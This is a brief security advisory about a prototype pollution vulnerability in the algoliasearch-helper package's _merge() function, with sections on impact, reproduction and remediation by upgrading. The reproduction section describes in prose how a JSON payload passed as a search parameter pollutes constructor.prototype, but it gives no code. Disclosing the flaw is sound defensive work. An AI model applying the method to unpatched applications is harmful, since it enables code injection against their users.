Algolia Algoliasearch Helper Prototype Pollution Vulnerability

A prototype pollution vulnerability has been identified in the Algolia Algoliasearch Helper package, specifically in versions 2.0.0-rc1 prior to 3.11.2. The vulnerability arises in the '_merge()' function within 'merge.js', where the function improperly handles the 'constructor.prototype'. Although writing to the prototype typically throws an error, this vulnerability allows for the injection of code into the user-supplied search parameter, which could potentially be executed. This issue is related to a previously reported vulnerability, CVE-2021-23433, but is distinct in its exploitation method.

Impact

Exploitation of this vulnerability leads to prototype pollution, allowing an attacker to inject properties into JavaScript prototypes. This can cause various issues, such as overwriting fundamental object attributes, leading to JavaScript exceptions, or manipulating application logic to execute injected code. In this case, the vulnerability could be exploited to execute code through the polluted prototype.

Reproduction

The vulnerability can be reproduced by using the 'algoliasearch-helper' package version 2.0.0-rc1 prior to 3.11.2. Inject a property into the 'constructor.prototype' using the '_merge()' function in 'merge.js'. Even though this action throws an error, if the error is caught, the injected code can be executed. This can be done by parsing a JSON string that includes the prototype pollution payload and passing it as a search parameter.

Remediation

Users can upgrade to version 3.11.2 or higher to address this vulnerability.